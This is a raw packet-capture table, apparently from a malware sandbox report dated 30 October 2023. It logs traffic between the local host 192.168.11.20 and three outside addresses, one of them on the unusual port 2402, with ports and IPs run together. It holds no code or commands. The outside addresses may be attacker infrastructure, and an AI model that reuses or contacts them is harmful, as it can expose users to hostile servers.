                                                                                                                                                                                        Oct 30, 2023 14:17:51.145906925 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.145926952 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.145967960 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.146006107 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.146006107 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.146054983 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.146140099 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.146152973 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.146163940 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.146184921 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.146219969 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.146305084 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.146305084 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.146400928 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.435405016 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.435492992 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.435556889 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.435621023 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.435640097 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.435693979 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.435754061 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.435816050 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.442985058 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.443073034 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.443137884 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.443202019 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.443223000 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.443254948 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.443331003 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.443334103 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.443428040 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.443437099 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.443514109 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.443535089 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.443603039 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.443639040 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.443725109 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.443773985 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.443805933 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.443850994 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.443919897 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.443929911 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.443993092 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.444050074 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.444076061 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.444169998 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.444202900 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.444274902 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.444334984 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.444355011 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.444442987 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.444475889 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.444533110 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.444539070 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.444602966 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.444633961 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.444709063 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.444716930 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.444803953 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.444828987 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.444885015 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.444905996 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.444968939 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.444998026 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.445074081 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.445094109 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.445180893 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.445192099 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.445247889 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.445275068 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.445332050 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.445379972 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.445424080 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.445489883 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.445555925 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.445573092 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.445647001 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.445671082 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.445749998 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.445769072 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.445841074 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.445866108 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.445930958 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.445959091 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.446021080 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.446062088 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.446127892 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.446152925 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.446239948 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.446271896 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.446327925 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.446346998 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.446398020 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.446460962 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.446502924 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.446562052 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.446621895 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.446641922 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.446723938 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.446732998 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.446815014 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.446821928 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.446908951 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.446945906 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.447002888 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.447011948 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.447088957 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.447108984 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.447191954 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.447196960 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.447283030 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.447287083 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.447361946 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.447381973 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.447438002 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.447489023 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.447567940 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.447570086 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.447659969 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.447699070 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.447753906 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.447756052 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.447829008 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.447850943 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.447942019 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.447947025 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.448055029 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.448065996 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.448123932 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.448164940 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.448205948 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.448268890 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.448323965 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.448349953 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.448432922 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.448466063 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.448523998 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.448527098 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.448596001 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.448620081 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.448673010 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.448726892 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.448792934 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.448808908 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.448883057 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.448905945 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.448993921 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.449026108 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.449083090 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.449101925 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.449155092 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.449208975 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.449259043 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.449292898 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.449372053 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.449377060 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.449453115 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.449470043 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.449531078 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.449572086 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.449623108 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.449659109 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.449728966 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.449820995 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:52.152844906 CET500942402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:52.392558098 CET24025009494.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:52.393392086 CET500942402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:52.394654989 CET500942402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:52.654401064 CET24025009494.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:52.657161951 CET500942402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:52.896262884 CET24025009494.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:52.900760889 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:52.947325945 CET500942402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:53.036400080 CET5009680192.168.11.20178.237.33.50
                                                                                                                                                                                        Oct 30, 2023 14:17:53.137794971 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:53.138303041 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:53.138936996 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:53.285361052 CET8050096178.237.33.50192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:53.285550117 CET5009680192.168.11.20178.237.33.50
                                                                                                                                                                                        Oct 30, 2023 14:17:53.285733938 CET5009680192.168.11.20178.237.33.50
                                                                                                                                                                                        Oct 30, 2023 14:17:53.381980896 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:53.382067919 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:53.382127047 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:53.382180929 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:53.382344961 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:53.382399082 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:53.539247036 CET8050096178.237.33.50192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:53.539710999 CET5009680192.168.11.20178.237.33.50
                                                                                                                                                                                        Oct 30, 2023 14:17:53.582657099 CET500942402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:53.619951963 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:53.620065928 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:53.620132923 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:53.620191097 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:53.620244980 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:53.620296955 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:53.620349884 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:53.620404959 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:53.620595932 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:53.621016026 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:53.858077049 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:53.858167887 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:53.858232975 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:53.858294010 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:53.858355045 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:53.858416080 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:53.858475924 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:53.858536005 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:53.858603001 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:53.858608007 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:53.858714104 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:53.858782053 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:53.858843088 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:53.858905077 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:53.859023094 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:53.872272968 CET24025009494.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:53.900263071 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.096462965 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.096540928 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.096600056 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.096653938 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.096713066 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.096769094 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.096824884 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.096946001 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.097060919 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.097320080 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.097398996 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.097455025 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.097508907 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.097564936 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.097619057 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.097671986 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.097697973 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.097698927 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.097765923 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.097783089 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.097855091 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.097893953 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.097933054 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.098002911 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.098026037 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.098329067 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.138258934 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.138338089 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.138705969 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.335503101 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.335596085 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.335663080 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.335726023 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.335788012 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.335824966 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.335939884 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.336014032 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.336153984 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.336168051 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.336220980 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.336280107 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.336333036 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.336374044 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.336452007 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.336515903 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.336581945 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.336580992 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.336669922 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.336675882 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.336762905 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.336829901 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.336843014 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.336936951 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.336985111 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.336999893 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.337085009 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.337148905 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.337210894 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.337256908 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.337291956 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.337318897 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.337395906 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.337462902 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.337526083 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.337587118 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.337663889 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.337800026 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.337804079 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.337894917 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.337960958 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.338027000 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.338076115 CET500952402192.168.11.2094.156.6.253
